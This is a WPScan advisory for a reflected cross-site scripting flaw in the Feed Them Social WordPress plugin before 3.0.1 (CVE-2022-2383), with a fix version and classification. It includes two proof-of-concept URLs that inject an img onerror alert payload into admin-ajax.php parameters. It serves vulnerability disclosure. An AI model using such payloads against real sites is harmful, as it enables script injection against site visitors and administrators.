WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

Both can be used against authenticated and unauthenticated users

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&access_token=<img src onerror=alert(/XSS/)>

https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(/XSS/)>

Affects Plugins

feed-them-social
Fixed in version 3.0.1

References

CVE
CVE-2022-2383

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
4a3b3023-e740-411c-a77c-6477b80d7531

Timeline

Publicly Published

2022-07-26 (about 10 months ago)

Added

2022-07-26 (about 10 months ago)

Last Updated

2022-08-25 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin